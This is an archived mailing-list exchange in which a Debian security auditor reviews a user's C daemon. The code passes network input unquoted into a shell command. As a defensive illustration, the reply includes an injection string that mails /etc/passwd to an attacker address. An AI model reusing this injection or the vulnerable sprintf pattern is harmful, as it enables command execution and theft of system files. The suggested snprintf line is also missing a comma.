Re: SOLVED: Daemon Programming
Yep, thats a good point, that I havent realized. The security stuff is
very very important.
I have to change the code to be able to manage this problems. This is
the next step.
Thanks for your advice ;-)
Sergio Cuellar Valdes
On Fri, 14 Jan 2005 03:58:44 +0000, Steve Kemp <skx@debian.org> wrote:
> On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cu?llar Vald?s wrote:
> > Marc, thanks that was the problem !!!
> >
> > sprintf(message, "say -s 4 -a \"%s\"", buffer); < this was the big
> > big big mistake
>
> It certainly was.
>
> > I added the hole path to the instructions:
> >
> > sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> >
> > Thanks to all of you who helped me !! :-)
>
> You deamonize. You open a socket. You read input from that
> socket - carefully avoiding buffer overflows - then you run the
> command:
>
> /usr/local/bin/say -s 4 -a "the text you read"
>
> Firstly you don't avoid a simple buffer overflow. Although
> you have two buffers, 'buffer' for receiving the message from
> the network and 'message' for running the command are both the
> same size you don't account for the extra characters when you're
> copying:
>
> sprintf(message, "say -s 4 -a \"%s\"", buffer);
>
> At least change that to:
>
> snprintf(message, sizeof(message) "say -s 4 -a \"%s\"", buffer);
>
> Secondly, and this is the biggie, you don't quote or process the
> characters which are read from the network.
>
> Consider what would happen if a malicious user sent this:
>
> "; cat /etc/passwd | mail l33thack0r@hotmail.com ; echo "
>
> You would run this commend:
>
> /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""
>
> Effectively you're allowing any user who can connect to your server
> to execute arbitary commands. If this is started by init you're likely
> running as root too.
>
> Check that the characters you read from the network are only
> [a-zA-Z ] and you're probably OK.
>
> Steve
> --
> # The Debian Security Audit Project.
> http://www.debian.org/security/audit
>
>
--
"Meine Hoffnung soll mich leiten
Durch die Tage ohne Dich
Und die Liebe soll mich tragen
Wenn der Schmerz die Hoffnung bricht"
Reply to: